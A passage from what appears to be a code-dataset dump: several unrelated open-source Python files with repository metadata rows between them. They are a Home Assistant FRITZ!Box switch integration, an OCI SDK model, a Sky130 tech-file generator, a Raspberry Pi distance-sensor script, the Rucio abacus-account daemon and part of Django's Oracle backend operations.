        self._attributes["number"] = self.dict_of_deflection["Number"]
        self._attributes["deflection_to_number"] = self.dict_of_deflection[
            "DeflectionToNumber"
        ]
        # Return mode sample: "eImmediately" — strip the leading "e" prefix.
        self._attributes["mode"] = self.dict_of_deflection["Mode"][1:]
        self._attributes["outgoing"] = self.dict_of_deflection["Outgoing"]
        self._attributes["phonebook_id"] = self.dict_of_deflection["PhonebookID"]
    async def _async_switch_on_off_executor(self, turn_on: bool) -> None:
        """Handle deflection switch."""
        await self._avm_wrapper.async_set_deflection_enable(self.id, turn_on)
class FritzBoxProfileSwitch(FritzDeviceBase, SwitchEntity):
    """Defines a FRITZ!Box Tools DeviceProfile switch.

    Controls internet (WAN) access for one tracked network device.
    """
    _attr_icon = "mdi:router-wireless-settings"
    def __init__(self, avm_wrapper: AvmWrapper, device: FritzDevice) -> None:
        """Init Fritz profile."""
        super().__init__(avm_wrapper, device)
        self._attr_is_on: bool = False
        self._name = f"{device.hostname} Internet Access"
        self._attr_unique_id = f"{self._mac}_internet_access"
        self._attr_entity_category = EntityCategory.CONFIG
        # Link the entity to the tracked device's registry entry, with the
        # FRITZ!Box itself as the parent (via_device).
        self._attr_device_info = DeviceInfo(
            connections={(CONNECTION_NETWORK_MAC, self._mac)},
            default_manufacturer="AVM",
            default_model="FRITZ!Box Tracked device",
            default_name=device.hostname,
            identifiers={(DOMAIN, self._mac)},
            via_device=(
                DOMAIN,
                avm_wrapper.unique_id,
            ),
        )
    @property
    def is_on(self) -> bool | None:
        """Switch status: current WAN access state of the tracked device."""
        return self._avm_wrapper.devices[self._mac].wan_access
    @property
    def available(self) -> bool:
        """Return availability of the switch."""
        # Unknown WAN access state means the switch cannot be trusted.
        if self._avm_wrapper.devices[self._mac].wan_access is None:
            return False
        return super().available
    async def async_turn_on(self, **kwargs: Any) -> None:
        """Turn on switch."""
        await self._async_handle_turn_on_off(turn_on=True)
    async def async_turn_off(self, **kwargs: Any) -> None:
        """Turn off switch."""
        await self._async_handle_turn_on_off(turn_on=False)
    async def _async_handle_turn_on_off(self, turn_on: bool) -> bool:
        """Set WAN access for the device; False when it has no known IP."""
        if not self.ip_address:
            return False
        await self._avm_wrapper.async_set_allow_wan_access(self.ip_address, turn_on)
        self.async_write_ha_state()
        return True
class FritzBoxWifiSwitch(FritzBoxBaseSwitch, SwitchEntity):
    """Switch enabling or disabling one Wi-Fi network of the FRITZ!Box."""

    def __init__(
        self,
        avm_wrapper: AvmWrapper,
        device_friendly_name: str,
        network_num: int,
        network_name: str,
    ) -> None:
        """Init Fritz Wifi switch."""
        self._avm_wrapper = avm_wrapper
        self._attributes = {}
        self._attr_entity_category = EntityCategory.CONFIG
        self._network_num = network_num
        super().__init__(
            self._avm_wrapper,
            device_friendly_name,
            SwitchInfo(
                description=f"Wi-Fi {network_name}",
                friendly_name=device_friendly_name,
                icon="mdi:wifi",
                type=SWITCH_TYPE_WIFINETWORK,
                callback_update=self._async_fetch_update,
                callback_switch=self._async_switch_on_off_executor,
            ),
        )

    async def _async_fetch_update(self) -> None:
        """Refresh on/off state and attributes from the box."""
        info = await self._avm_wrapper.async_get_wlan_configuration(self._network_num)
        _LOGGER.debug(
            "Specific %s response: GetInfo=%s", SWITCH_TYPE_WIFINETWORK, info
        )
        if not info:
            self._is_available = False
            return
        self._is_available = True
        self._attr_is_on = info["NewEnable"] is True
        self._attributes["standard"] = info["NewStandard"] or None
        self._attributes["bssid"] = info["NewBSSID"]
        self._attributes["mac_address_control"] = info["NewMACAddressControlEnabled"]

    async def _async_switch_on_off_executor(self, turn_on: bool) -> None:
        """Enable or disable this Wi-Fi network."""
        await self._avm_wrapper.async_set_wlan_configuration(self._network_num, turn_on)
| 33.838765 | 322 | 0.652372 |
3121125d0795c22780c7be0c12107d22d73545d3 | 3,623 | py | Python | src/oci/database_tools/models/database_tools_key_store_password_summary.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/database_tools/models/database_tools_key_store_password_summary.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/database_tools/models/database_tools_key_store_password_summary.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class DatabaseToolsKeyStorePasswordSummary(object):
    """
    The key store password.
    """

    #: A constant which can be used with the value_type property of a DatabaseToolsKeyStorePasswordSummary.
    #: This constant has a value of "SECRETID"
    VALUE_TYPE_SECRETID = "SECRETID"

    def __init__(self, **kwargs):
        """
        Initializes a new DatabaseToolsKeyStorePasswordSummary object with values from keyword arguments. This class has the following subclasses and if you are using this class as input
        to a service operations then you should favor using a subclass over the base class:

        * :class:`~oci.database_tools.models.DatabaseToolsKeyStorePasswordSecretIdSummary`

        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param value_type:
            The value to assign to the value_type property of this DatabaseToolsKeyStorePasswordSummary.
            Allowed values for this property are: "SECRETID", 'UNKNOWN_ENUM_VALUE'.
            Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
        :type value_type: str

        """
        self.swagger_types = {
            'value_type': 'str'
        }

        self.attribute_map = {
            'value_type': 'valueType'
        }

        self._value_type = None

    @staticmethod
    def get_subtype(object_dictionary):
        """
        Given the hash representation of a subtype of this class,
        use the info in the hash to return the class of the subtype.
        """
        # Renamed the local from ``type`` to ``subtype`` so the builtin
        # ``type`` is not shadowed.
        subtype = object_dictionary['valueType']

        if subtype == 'SECRETID':
            return 'DatabaseToolsKeyStorePasswordSecretIdSummary'
        else:
            return 'DatabaseToolsKeyStorePasswordSummary'

    @property
    def value_type(self):
        """
        **[Required]** Gets the value_type of this DatabaseToolsKeyStorePasswordSummary.
        The value type of the key store password.

        Allowed values for this property are: "SECRETID", 'UNKNOWN_ENUM_VALUE'.
        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.


        :return: The value_type of this DatabaseToolsKeyStorePasswordSummary.
        :rtype: str
        """
        return self._value_type

    @value_type.setter
    def value_type(self, value_type):
        """
        Sets the value_type of this DatabaseToolsKeyStorePasswordSummary.
        The value type of the key store password.


        :param value_type: The value_type of this DatabaseToolsKeyStorePasswordSummary.
        :type: str
        """
        # Values outside the allowed set are coerced to the sentinel rather
        # than rejected, matching service behavior for unknown enum values.
        allowed_values = ["SECRETID"]
        if not value_allowed_none_or_none_sentinel(value_type, allowed_values):
            value_type = 'UNKNOWN_ENUM_VALUE'
        self._value_type = value_type

    def __repr__(self):
        return formatted_flat_dict(self)

    def __eq__(self, other):
        if other is None:
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self == other
| 36.23 | 245 | 0.687 |
81fedb424577397baee6353db2cc551b902660b4 | 3,077 | py | Python | src/hammer-vlsi/technology/sky130/extra/sky130-tech-gen.py | httpsgithu/hammer | 6099f4169a49f71cee2e24bb1052f273039505cd | [
"BSD-3-Clause"
] | 138 | 2017-08-15T18:56:55.000Z | 2022-03-29T05:23:37.000Z | src/hammer-vlsi/technology/sky130/extra/sky130-tech-gen.py | httpsgithu/hammer | 6099f4169a49f71cee2e24bb1052f273039505cd | [
"BSD-3-Clause"
] | 444 | 2017-09-11T01:15:37.000Z | 2022-03-31T17:30:33.000Z | src/hammer-vlsi/technology/sky130/extra/sky130-tech-gen.py | httpsgithu/hammer | 6099f4169a49f71cee2e24bb1052f273039505cd | [
"BSD-3-Clause"
] | 33 | 2017-10-30T14:23:53.000Z | 2022-03-25T01:36:13.000Z | '''
Purpose: generate the json file required by the Hammer Sky130 tech plugin
Usage:
export PDK_ROOT=<path-to-dir-containing-sky130-setup>
python sky130-tech-gen.py
Output:
sky130.tech.json: specifies Sky130 PDK file locations and various details
'''
import json
import os
from pathlib import Path
# When True, read the NDA variant of the base tech JSON.
use_nda_files=True
library='sky130_fd_sc_hd'
# Root of the sky130A PDK install; abort early with a clear message if unset.
PDK_ROOT = os.getenv('PDK_ROOT')
if PDK_ROOT is None:
    print("Error: Must set $PDK_ROOT to the directory that contains skywater-pdk and the root of the sky130A install.")
    exit()
SKY130A = os.path.join(PDK_ROOT, 'share/pdk/sky130A')
# Start from the base template, then splice in the cell lists.
if use_nda_files:
    with open('sky130-tech-gen-files/beginning_nda.json', 'r') as f: data = json.load(f)
else:
    with open('sky130-tech-gen-files/beginning.json', 'r') as f: data = json.load(f)
with open('sky130-tech-gen-files/cells.json', 'r') as f:
    cells = json.load(f)
data["physical only cells list"] = cells["physical only cells list"]
data["dont use list"] = cells["dont use list"]
data["special cells"] = cells["special cells"]
# SKYWATER_LIBS keeps a literal '$SKY130A' placeholder (expanded later by the
# consumer); LIBRARY_PATH is the concrete on-disk lib directory scanned below.
SKYWATER_LIBS = os.path.join('$SKY130A','libs.ref',library)
LIBRARY_PATH = os.path.join(SKY130A,'libs.ref',library,'lib')
lib_corner_files=os.listdir(LIBRARY_PATH)
# One "libraries" entry per corner .lib file of the selected standard cell library.
for cornerfilename in lib_corner_files:
    if (not (library in cornerfilename) ) : continue
    if ('ccsnoise' in cornerfilename): continue # ignore duplicate corner.lib/corner_ccsnoise.lib files
    tmp = cornerfilename.replace('.lib','')
    if (tmp+'_ccsnoise.lib' in lib_corner_files):
        cornerfilename=tmp+'_ccsnoise.lib' # use ccsnoise version of lib file
    # Corner name is the part after the library prefix, e.g. "ff_n40C_1v95":
    # <speed>_<temperature>_<voltage>.
    cornername = tmp.split('__')[1]
    cornerparts = cornername.split('_')
    speed = cornerparts[0]
    if (speed == 'ff'): speed = 'fast'
    if (speed == 'tt'): speed = 'typical'
    if (speed == 'ss'): speed = 'slow'
    # "n40C" -> "-40 C": leading 'n' marks a negative temperature.
    temp = cornerparts[1]
    temp = temp.replace('n','-')
    temp = temp.split('C')[0]+' C'
    # "1v95" -> "1.95 V"
    vdd = cornerparts[2]
    vdd = vdd.split('v')[0]+'.'+vdd.split('v')[1]+' V'
    lib_entry = {
        "nldm liberty file": os.path.join(SKYWATER_LIBS,'lib', cornerfilename),
        "verilog sim": os.path.join('tech-sky130-cache', library+'.v'),
        "lef file": os.path.join(SKYWATER_LIBS,'lef', library+'.lef'),
        "spice file": os.path.join('tech-sky130-cache', library+'.cdl'),
        "gds file": os.path.join(SKYWATER_LIBS,'gds', library+'.gds'),
        "corner": {
            "nmos": speed,
            "pmos": speed,
            "temperature": temp
        },
        "supplies": {
            "VDD": vdd,
            "GND": "0 V"
        },
        "provides": [
            {
                "lib_type": "stdcell",
                "vt": "RVT"
            }
        ]
    }
    data["libraries"].append(lib_entry)
# Append stackup and site definitions before writing the final tech JSON.
with open('sky130-tech-gen-files/stackups.json', 'r') as f:
    stackups = json.load(f)
data["stackups"] = [stackups]
with open('sky130-tech-gen-files/sites.json', 'r') as f:
    sites = json.load(f)
data["sites"] = sites["sites"]
with open('../sky130.tech.json', 'w') as f:
json.dump(data, f, indent=2) | 32.734043 | 119 | 0.620409 |
291e6d9e92986f5444e20f52bfcfd56b0c935484 | 1,879 | py | Python | distance_sensor.py | stephen-allison/pibot | f5128ca5268ab1b29909c7245867646c6c18edbc | [
"CC0-1.0"
] | null | null | null | distance_sensor.py | stephen-allison/pibot | f5128ca5268ab1b29909c7245867646c6c18edbc | [
"CC0-1.0"
] | null | null | null | distance_sensor.py | stephen-allison/pibot | f5128ca5268ab1b29909c7245867646c6c18edbc | [
"CC0-1.0"
] | null | null | null | import RPi.GPIO as GPIO
import time
def measureDistance():
    """Measure distance in cm with an HC-SR04-style ultrasonic sensor.

    Triggers a 10 us pulse, times how long the echo pin stays high and
    converts that round-trip time to a one-way distance in centimetres.
    If the echo is implausibly long (sensor too close), the reading is
    collapsed to 0.
    """
    # Set trigger to False (Low)
    GPIO.output(pinTrigger, False)
    # Allow module to settle
    time.sleep(0.5)
    # Send 10us pulse to trigger
    GPIO.output(pinTrigger, True)
    time.sleep(0.00001)
    GPIO.output(pinTrigger, False)
    # Start the timer
    startTime = time.time()
    # Fix: ensure stopTime is always defined — previously a missing echo left
    # it unbound and caused a NameError below.
    stopTime = startTime
    # The start time is reset until the Echo pin is taken high (==1)
    while GPIO.input(pinEcho) == 0:
        startTime = time.time()
    # Stop when the Echo pin is no longer high - the end time
    while GPIO.input(pinEcho) == 1:
        stopTime = time.time()
        # If the sensor is too close to an object, the Pi cannot see the echo
        # quickly enough, so it has to detect that problem and say what has
        # happened. Fix: this check (and its `break`) must live inside the
        # loop — the original had `break` at function level, a SyntaxError.
        if stopTime - startTime >= 0.04:
            print("Hold on there! You're too close for me to see.")
            stopTime = startTime
            break
    # Calculate pulse length
    elapsedTime = stopTime - startTime
    # Distance pulse travelled in that time is
    # time multiplied by the speed of sound (cm/s)
    distance = elapsedTime * 34326
    # That was the distance there and back so halve the value
    distance = distance / 2
    return distance
# BCM pin numbers (runSensor calls GPIO.setmode(GPIO.BCM)) for the
# ultrasonic sensor's trigger and echo lines.
pinTrigger = 17
pinEcho = 18
def init():
    """Configure the trigger pin as output and the echo pin as input."""
    # Define GPIO pins to use on the Pi
    GPIO.setup(pinTrigger, GPIO.OUT) # Trigger
    GPIO.setup(pinEcho, GPIO.IN) # Echo
def runSensor():
    """Print a distance reading every half second until Ctrl+C, then clean up."""
    GPIO.setmode(GPIO.BCM)
    GPIO.setwarnings(False)
    init()
    try:
        while True:
            reading = measureDistance()
            print("Distance : %.1f" % reading)
            time.sleep(0.5)
    except KeyboardInterrupt:
        # Ctrl+C: release the GPIO pins before exiting.
        GPIO.cleanup()
# Start the sensor loop only when executed directly, not when imported.
if __name__ == "__main__":
    runSensor()
| 29.825397 | 156 | 0.633316 |
71cc1854d554f041e32d14dda564b549ee70fa0a | 5,225 | py | Python | lib/rucio/daemons/abacus/account.py | llwang00/rucio | f49c5c9599e147823110dc6da22a0bc33a881f8e | [
"Apache-2.0"
] | 1 | 2019-03-15T19:29:35.000Z | 2019-03-15T19:29:35.000Z | lib/rucio/daemons/abacus/account.py | llwang00/rucio | f49c5c9599e147823110dc6da22a0bc33a881f8e | [
"Apache-2.0"
] | 58 | 2020-04-14T09:04:04.000Z | 2021-07-13T15:12:59.000Z | lib/rucio/daemons/abacus/account.py | llwang00/rucio | f49c5c9599e147823110dc6da22a0bc33a881f8e | [
"Apache-2.0"
] | 1 | 2020-03-02T17:18:14.000Z | 2020-03-02T17:18:14.000Z | # -*- coding: utf-8 -*-
# Copyright 2014-2020 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2014-2019
# - Vincent Garonne <vincent.garonne@cern.ch>, 2014-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
"""
Abacus-Account is a daemon to update Account counters.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.config import config_get
from rucio.common.utils import get_thread_with_periodic_running_function
from rucio.core.account_counter import get_updated_account_counters, update_account_counter, fill_account_counter_history_table
from rucio.core.heartbeat import live, die, sanity_check
# Set by stop() to ask the worker loop(s) to exit gracefully.
graceful_stop = threading.Event()
# Root logger writes to stdout; the level comes from the 'common/loglevel'
# config option and defaults to DEBUG when unset.
logging.basicConfig(stream=sys.stdout,
                    level=getattr(logging,
                                  config_get('common', 'loglevel',
                                             raise_exception=False,
                                             default='DEBUG').upper()),
                    format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def account_update(once=False):
    """
    Main loop to check and update the Account Counters.

    Registers a heartbeat for this worker, then repeatedly fetches the
    (account, rse_id) pairs whose counters were updated and recomputes each
    one, until `graceful_stop` is set (or after a single pass when `once`).

    :param once: if True, perform one iteration and return.
    """
    logging.info('account_update: starting')
    logging.info('account_update: started')
    # Make an initial heartbeat so that all abacus-account daemons have the correct worker number on the next try
    executable = 'abacus-account'
    hostname = socket.gethostname()
    pid = os.getpid()
    current_thread = threading.current_thread()
    live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
    while not graceful_stop.is_set():
        try:
            # Renew the heartbeat; the returned dict carries this worker's
            # thread number and the total thread count used for sharding work.
            heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
            # Select the batch of updated account counters assigned to this worker.
            start = time.time()  # NOQA
            account_rse_ids = get_updated_account_counters(total_workers=heartbeat['nr_threads'],
                                                           worker_number=heartbeat['assign_thread'])
            logging.debug('Index query time %f size=%d' % (time.time() - start, len(account_rse_ids)))
            # If the list is empty, send the worker to sleep (unless running once).
            if not account_rse_ids and not once:
                logging.info('account_update[%s/%s] did not get any work' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1))
                time.sleep(10)
            else:
                for account_rse_id in account_rse_ids:
                    # Honor a shutdown request even in the middle of a batch.
                    if graceful_stop.is_set():
                        break
                    start_time = time.time()
                    update_account_counter(account=account_rse_id[0], rse_id=account_rse_id[1])
                    logging.debug('account_update[%s/%s]: update of account-rse counter "%s-%s" took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, account_rse_id[0], account_rse_id[1], time.time() - start_time))
        except Exception:
            # Keep the daemon alive on unexpected errors: log and continue.
            logging.error(traceback.format_exc())
        if once:
            break
    logging.info('account_update: graceful stop requested')
    die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
    logging.info('account_update: graceful stop done')
def stop(signum=None, frame=None):
    """Signal handler requesting a graceful shutdown of all worker threads.

    Both parameters are accepted (and ignored) so this function can be
    registered directly with signal.signal().
    """
    graceful_stop.set()
def run(once=False, threads=1, fill_history_table=False):
    """
    Starts up the Abacus-Account threads.

    :param once: if True, run a single iteration in the calling thread.
    :param threads: number of account_update worker threads to spawn.
    :param fill_history_table: if True, also start a thread that hourly
        snapshots the account counters into the history table.
    :raises exception.DatabaseException: if the database schema is outdated.
    """
    if rucio.db.sqla.util.is_old_db():
        raise exception.DatabaseException('Database was not updated, daemon won\'t start')
    executable = 'abacus-account'
    hostname = socket.gethostname()
    sanity_check(executable=executable, hostname=hostname)
    if once:
        logging.info('main: executing one iteration only')
        account_update(once)
    else:
        logging.info('main: starting threads')
        # Use a distinct name for the Thread objects so the integer `threads`
        # argument is not shadowed by a list.
        workers = [threading.Thread(target=account_update, kwargs={'once': once}) for _ in range(threads)]
        if fill_history_table:
            workers.append(get_thread_with_periodic_running_function(3600, fill_account_counter_history_table, graceful_stop))
        # Plain loops instead of side-effect list comprehensions.
        for worker in workers:
            worker.start()
        logging.info('main: waiting for interrupts')
        # Interruptible joins require a timeout.
        while workers[0].is_alive():
            for worker in workers:
                worker.join(timeout=3.14)
| 38.992537 | 229 | 0.664306 |
fa29a8925ac91dbf3a54e39424f6e7500d1afc20 | 24,223 | py | Python | django/db/backends/oracle/operations.py | sergeykolosov/django | 03049fb8d96ccd1f1ed0285486103542de42faba | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | django/db/backends/oracle/operations.py | sergeykolosov/django | 03049fb8d96ccd1f1ed0285486103542de42faba | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | django/db/backends/oracle/operations.py | sergeykolosov/django | 03049fb8d96ccd1f1ed0285486103542de42faba | [
"PSF-2.0",
"BSD-3-Clause"
] | 1 | 2021-05-10T10:16:03.000Z | 2021-05-10T10:16:03.000Z | import datetime
import re
import uuid
from django.conf import settings
from django.db.backends.base.operations import BaseDatabaseOperations
from django.db.backends.utils import strip_quotes, truncate_name
from django.utils import timezone
from django.utils.encoding import force_bytes
from .base import Database
from .utils import BulkInsertMapper, InsertIdVar, Oracle_datetime
class DatabaseOperations(BaseDatabaseOperations):
    """Oracle-specific implementations of Django's database operations API."""
    # Oracle uses NUMBER(11) and NUMBER(19) for integer fields.
    integer_field_ranges = {
        'SmallIntegerField': (-99999999999, 99999999999),
        'IntegerField': (-99999999999, 99999999999),
        'BigIntegerField': (-9999999999999999999, 9999999999999999999),
        'PositiveSmallIntegerField': (0, 99999999999),
        'PositiveIntegerField': (0, 99999999999),
    }
    # Oracle spells the SQL set-difference operator MINUS instead of EXCEPT.
    set_operators = dict(BaseDatabaseOperations.set_operators, difference='MINUS')
    # TODO: colorize this SQL code with style.SQL_KEYWORD(), etc.
    # PL/SQL template that fast-forwards a column's backing sequence until it
    # is >= MAX(column); the %% escapes survive the later (query % params)
    # interpolation step.
    _sequence_reset_sql = """
DECLARE
    table_value integer;
    seq_value integer;
    seq_name user_tab_identity_cols.sequence_name%%TYPE;
BEGIN
    BEGIN
        SELECT sequence_name INTO seq_name FROM user_tab_identity_cols
        WHERE table_name = '%(table_name)s' AND
              column_name = '%(column_name)s';
        EXCEPTION WHEN NO_DATA_FOUND THEN
            seq_name := '%(no_autofield_sequence_name)s';
    END;
    SELECT NVL(MAX(%(column)s), 0) INTO table_value FROM %(table)s;
    SELECT NVL(last_number - cache_size, 0) INTO seq_value FROM user_sequences
    WHERE sequence_name = seq_name;
    WHILE table_value > seq_value LOOP
        EXECUTE IMMEDIATE 'SELECT "'||seq_name||'".nextval FROM DUAL'
        INTO seq_value;
    END LOOP;
END;
/"""
    # Oracle doesn't support string without precision; use the max string size.
    cast_char_field_without_max_length = 'NVARCHAR2(2000)'
def cache_key_culling_sql(self):
return """
SELECT cache_key
FROM (SELECT cache_key, rank() OVER (ORDER BY cache_key) AS rank FROM %s)
WHERE rank = %%s + 1
"""
def date_extract_sql(self, lookup_type, field_name):
if lookup_type == 'week_day':
# TO_CHAR(field, 'D') returns an integer from 1-7, where 1=Sunday.
return "TO_CHAR(%s, 'D')" % field_name
elif lookup_type == 'week':
# IW = ISO week number
return "TO_CHAR(%s, 'IW')" % field_name
elif lookup_type == 'quarter':
return "TO_CHAR(%s, 'Q')" % field_name
else:
# https://docs.oracle.com/database/121/SQLRF/functions067.htm#SQLRF00639
return "EXTRACT(%s FROM %s)" % (lookup_type.upper(), field_name)
def date_interval_sql(self, timedelta):
"""
NUMTODSINTERVAL converts number to INTERVAL DAY TO SECOND literal.
"""
return "NUMTODSINTERVAL(%06f, 'SECOND')" % timedelta.total_seconds()
def date_trunc_sql(self, lookup_type, field_name):
# https://docs.oracle.com/database/121/SQLRF/functions271.htm#SQLRF52058
if lookup_type in ('year', 'month'):
return "TRUNC(%s, '%s')" % (field_name, lookup_type.upper())
elif lookup_type == 'quarter':
return "TRUNC(%s, 'Q')" % field_name
else:
return "TRUNC(%s)" % field_name
    # Oracle crashes with "ORA-03113: end-of-file on communication channel"
    # if the time zone name is passed in parameter. Use interpolation instead.
    # https://groups.google.com/forum/#!msg/django-developers/zwQju7hbG78/9l934yelwfsJ
    # This regexp matches all time zone names from the zoneinfo database.
    _tzname_re = re.compile(r'^[\w/:+-]+$')
    def _convert_field_to_tz(self, field_name, tzname):
        """Return SQL converting *field_name* from UTC into *tzname*.

        :raises ValueError: if tzname doesn't look like a zoneinfo name --
            the name is interpolated into SQL, so it is validated first.
        """
        if not settings.USE_TZ:
            return field_name
        if not self._tzname_re.match(tzname):
            raise ValueError("Invalid time zone name: %s" % tzname)
        # Convert from UTC to local time, returning TIMESTAMP WITH TIME ZONE
        # and cast it back to TIMESTAMP to strip the TIME ZONE details.
        return "CAST((FROM_TZ(%s, '0:00') AT TIME ZONE '%s') AS TIMESTAMP)" % (field_name, tzname)
def datetime_cast_date_sql(self, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
return 'TRUNC(%s)' % field_name
def datetime_cast_time_sql(self, field_name, tzname):
# Since `TimeField` values are stored as TIMESTAMP where only the date
# part is ignored, convert the field to the specified timezone.
return self._convert_field_to_tz(field_name, tzname)
def datetime_extract_sql(self, lookup_type, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
return self.date_extract_sql(lookup_type, field_name)
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
field_name = self._convert_field_to_tz(field_name, tzname)
# https://docs.oracle.com/database/121/SQLRF/functions271.htm#SQLRF52058
if lookup_type in ('year', 'month'):
sql = "TRUNC(%s, '%s')" % (field_name, lookup_type.upper())
elif lookup_type == 'quarter':
sql = "TRUNC(%s, 'Q')" % field_name
elif lookup_type == 'day':
sql = "TRUNC(%s)" % field_name
elif lookup_type == 'hour':
sql = "TRUNC(%s, 'HH24')" % field_name
elif lookup_type == 'minute':
sql = "TRUNC(%s, 'MI')" % field_name
else:
sql = "CAST(%s AS DATE)" % field_name # Cast to DATE removes sub-second precision.
return sql
def time_trunc_sql(self, lookup_type, field_name):
# The implementation is similar to `datetime_trunc_sql` as both
# `DateTimeField` and `TimeField` are stored as TIMESTAMP where
# the date part of the later is ignored.
if lookup_type == 'hour':
sql = "TRUNC(%s, 'HH24')" % field_name
elif lookup_type == 'minute':
sql = "TRUNC(%s, 'MI')" % field_name
elif lookup_type == 'second':
sql = "CAST(%s AS DATE)" % field_name # Cast to DATE removes sub-second precision.
return sql
    def get_db_converters(self, expression):
        """Return the value converters needed for *expression*'s field type.

        Extends the base converters with Oracle-specific ones (LOB reading,
        0/1 booleans, TIMESTAMP-backed dates/times, string UUIDs) plus the
        NULL -> empty string/bytes mapping.
        """
        converters = super().get_db_converters(expression)
        internal_type = expression.output_field.get_internal_type()
        if internal_type == 'TextField':
            converters.append(self.convert_textfield_value)
        elif internal_type == 'BinaryField':
            converters.append(self.convert_binaryfield_value)
        elif internal_type in ['BooleanField', 'NullBooleanField']:
            converters.append(self.convert_booleanfield_value)
        elif internal_type == 'DateTimeField':
            converters.append(self.convert_datetimefield_value)
        elif internal_type == 'DateField':
            converters.append(self.convert_datefield_value)
        elif internal_type == 'TimeField':
            converters.append(self.convert_timefield_value)
        elif internal_type == 'UUIDField':
            converters.append(self.convert_uuidfield_value)
        # Oracle stores empty strings as null. If the field accepts the empty
        # string, undo this to adhere to the Django convention of using
        # the empty string instead of null.
        if expression.field.empty_strings_allowed:
            converters.append(
                self.convert_empty_bytes
                if internal_type == 'BinaryField' else
                self.convert_empty_string
            )
        return converters
def convert_textfield_value(self, value, expression, connection):
if isinstance(value, Database.LOB):
value = value.read()
return value
def convert_binaryfield_value(self, value, expression, connection):
if isinstance(value, Database.LOB):
value = force_bytes(value.read())
return value
def convert_booleanfield_value(self, value, expression, connection):
if value in (0, 1):
value = bool(value)
return value
# cx_Oracle always returns datetime.datetime objects for
# DATE and TIMESTAMP columns, but Django wants to see a
# python datetime.date, .time, or .datetime.
def convert_datetimefield_value(self, value, expression, connection):
if value is not None:
if settings.USE_TZ:
value = timezone.make_aware(value, self.connection.timezone)
return value
def convert_datefield_value(self, value, expression, connection):
if isinstance(value, Database.Timestamp):
value = value.date()
return value
def convert_timefield_value(self, value, expression, connection):
if isinstance(value, Database.Timestamp):
value = value.time()
return value
def convert_uuidfield_value(self, value, expression, connection):
if value is not None:
value = uuid.UUID(value)
return value
@staticmethod
def convert_empty_string(value, expression, connection):
return '' if value is None else value
@staticmethod
def convert_empty_bytes(value, expression, connection):
return b'' if value is None else value
def deferrable_sql(self):
return " DEFERRABLE INITIALLY DEFERRED"
def fetch_returned_insert_id(self, cursor):
return int(cursor._insert_id_var.getvalue())
def field_cast_sql(self, db_type, internal_type):
if db_type and db_type.endswith('LOB'):
return "DBMS_LOB.SUBSTR(%s)"
else:
return "%s"
def no_limit_value(self):
return None
def limit_offset_sql(self, low_mark, high_mark):
fetch, offset = self._get_limit_offset_params(low_mark, high_mark)
return '%s%s' % (
(' OFFSET %d ROWS' % offset) if offset else '',
(' FETCH FIRST %d ROWS ONLY' % fetch) if fetch else '',
)
def last_executed_query(self, cursor, sql, params):
# https://cx-oracle.readthedocs.io/en/latest/cursor.html#Cursor.statement
# The DB API definition does not define this attribute.
statement = cursor.statement
# Unlike Psycopg's `query` and MySQLdb`'s `_last_executed`, CxOracle's
# `statement` doesn't contain the query parameters. refs #20010.
return super().last_executed_query(cursor, statement, params)
def last_insert_id(self, cursor, table_name, pk_name):
sq_name = self._get_sequence_name(cursor, strip_quotes(table_name), pk_name)
cursor.execute('"%s".currval' % sq_name)
return cursor.fetchone()[0]
def lookup_cast(self, lookup_type, internal_type=None):
if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
return "UPPER(%s)"
return "%s"
def max_in_list_size(self):
return 1000
def max_name_length(self):
return 30
def pk_default_value(self):
return "NULL"
def prep_for_iexact_query(self, x):
return x
def process_clob(self, value):
if value is None:
return ''
return value.read()
def quote_name(self, name):
# SQL92 requires delimited (quoted) names to be case-sensitive. When
# not quoted, Oracle has case-insensitive behavior for identifiers, but
# always defaults to uppercase.
# We simplify things by making Oracle identifiers always uppercase.
if not name.startswith('"') and not name.endswith('"'):
